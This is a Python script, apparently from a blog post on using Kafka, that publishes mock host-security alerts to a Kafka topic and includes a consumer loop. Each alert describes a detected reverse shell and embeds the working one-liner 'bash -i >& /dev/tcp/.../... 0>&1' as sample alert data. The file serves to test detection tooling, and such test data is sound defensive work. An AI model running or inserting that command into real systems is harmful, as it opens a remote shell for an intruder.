# -*- coding: utf-8 -*-
"""
@author: Carey
@Created on: 2021/10/13 20:33
"""
import datetime
import json
import random
import time
import uuid
import logging
logging.basicConfig(level=logging.INFO)
from kafka import KafkaProducer, KafkaConsumer, KafkaAdminClient
bootstrap_servers = ['10.33.70.110:9092']
username = ""
password = ""
topic = "waf01"
group_id = "waf001"
def kafka_producer():
producer = KafkaProducer(
value_serializer=lambda v: json.dumps(v).encode('utf-8'),
bootstrap_servers=bootstrap_servers,
# security_protocol='SASL_PLAINTEXT',
# sasl_mechanism='PLAIN',
# sasl_plain_username=username,
# sasl_plain_password=password,
)
producer.metrics()
return producer
def send_topic_msg(producer, json_data):
producer.send(topic, json_data)
def kafka_data_random() -> dict:
src_ip = "10.33.40.64"
dst_ip = "192.168.0.1"
port = 30025
time = int(datetime.datetime.now().timestamp())
data = {"payload_id": f"{topic} caae11a67280125f97a6f", "payload_index": "detect_bounce_shell", "operation": "insert",
"payload": {"parent_name": "bash", "agent_id": "61150a9f5d41da6a", "pid": 969993,
"parent_cmd": f"bash -c bash -i >& /dev/tcp/{dst_ip}/{port} 0>&1", "remark": None,
"type": "反弹shell", "std_io": [{"type": "stdin", "ip": src_ip, "port": port},
{"type": "stdout", "ip": src_ip, "port": port}],
"result": "未处理", "internal_ip": dst_ip, "target_port": port, "path": "/usr/bin/bash",
"uid": "0", "charge_name": None, "host_location": None, "group_relate_name": "开发测试组",
"store_time": time, "parent_pid": 969992, "parent_path": "/usr/bin/bash",
"external_ip": src_ip, "group": "root", "severity": "高危", "host_ip": dst_ip,
"asset_number": None, "create_time": time, "charge_email": None, "pname": "bash",
"com_id": "1a16d9d267c1ac3397c9",
"ips": ["fe80::250:56ff:fe81:e855", dst_ip, "fe80::250:56ff:fe81:af60", dst_ip,
"fe80::250:56ff:fe81:9ac6", src_ip], "group_id": 3, "host_tag_map": {},
"target_ip": "10.233.131.64", "os_type": "linux",
"detail": f"主机 {src_ip} 发生反弹Shell,连接目标为{dst_ip}:60001",
"source_id": "611caae1cec4b14eea56be7f", "user": "root", "process_tree": [
{"user_name": "root", "uid": 0, "ppid": 0, "pid": 1, "path": "/usr/lib/systemd/systemd", "name": "systemd",
"group_name": "root", "file_mode": "100755", "euid_user_name": "root",
"cmd": "/usr/lib/systemd/systemd --system --deserialize 15"},
{"user_name": "root", "uid": 0, "ppid": 1, "pid": 1530, "path": "/usr/sbin/sshd", "name": "sshd",
"group_name": "root", "file_mode": "100755", "euid_user_name": "root", "cmd": "/usr/sbin/sshd -D"},
{"user_name": "root", "uid": 0, "ppid": 1530, "pid": 969220, "path": "/usr/sbin/sshd", "name": "sshd",
"group_name": "root", "file_mode": "100755", "euid_user_name": "root", "cmd": "sshd: root@pts/0"},
{"user_name": "root", "uid": 0, "ppid": 969220, "pid": 969222, "path": "/usr/bin/bash", "name": "bash",
"group_name": "root", "file_mode": "100755", "euid_user_name": "root", "cmd": "-bash"},
{"user_name": "root", "uid": 0, "ppid": 969222, "pid": 969991, "path": "/usr/bin/bash", "name": "sh",
"group_name": "root", "file_mode": "100755", "euid_user_name": "root",
"cmd": f"sh start.sh {dst_ip} {port}"},
{"user_name": "root", "uid": 0, "ppid": 969991, "pid": 969992, "path": "/usr/bin/bash", "name": "bash",
"group_name": "root", "file_mode": "100755", "euid_user_name": "root",
"cmd": f"bash -c bash -i >& /dev/tcp/{dst_ip}/{port} 0>&1"},
{"user_name": "root", "uid": 0, "ppid": 969992, "pid": 969993, "path": "/usr/bin/bash", "name": "bash",
"group_name": "root", "file_mode": "100755", "euid_user_name": "root", "cmd": "bash -i"}],
"host_name": "SEVP-APP-15", "node_id": "774c4e47683041686148", "node_name": "189java"}}
return data
def kafka_consumer():
consumer = KafkaConsumer(
client_id="Consumer-secker-01",
group_id=group_id,
bootstrap_servers=bootstrap_servers,
# security_protocol='SASL_PLAINTEXT',
# sasl_mechanism='PLAIN',
# sasl_plain_username=username,
# sasl_plain_password=password,
# session_timeout_ms=3000,
session_timeout_ms=10000,
heartbeat_interval_ms=3000,
enable_auto_commit=True,
# consumer_timeout_ms=3000,
auto_offset_reset='smallest',
# value_deserializer=lambda m: json.loads(m.decode('ascii'))
)
print("###########", consumer.topics())
consumer.subscribe([topic])
while True:
msg_batch = consumer.poll(timeout_ms=1000)
print(msg_batch)
for partition_batch in msg_batch.values():
if not partition_batch:
continue
for msg in partition_batch:
print(f"{msg.topic=}, {msg.partition=}, {msg.offset=}, {msg.value=}")
producer = kafka_producer()
starttime = datetime.datetime.now()
for i in range(0, 30):
data = kafka_data_random()
send_topic_msg(producer, data)
time.sleep(1)
producer.close()
endtime = datetime.datetime.now()
print(f"{endtime - starttime}.seconds")
#---------------
# kafka_consumer()
Python操作kafka
Reads: 1258
Edit
Comments
Make a comment
www.ultrapower.com ,王硕的博客,专注于研究互联网产品和技术,提供中文精品教程。
本网站与其它任何公司及/或商标无任何形式关联或合作。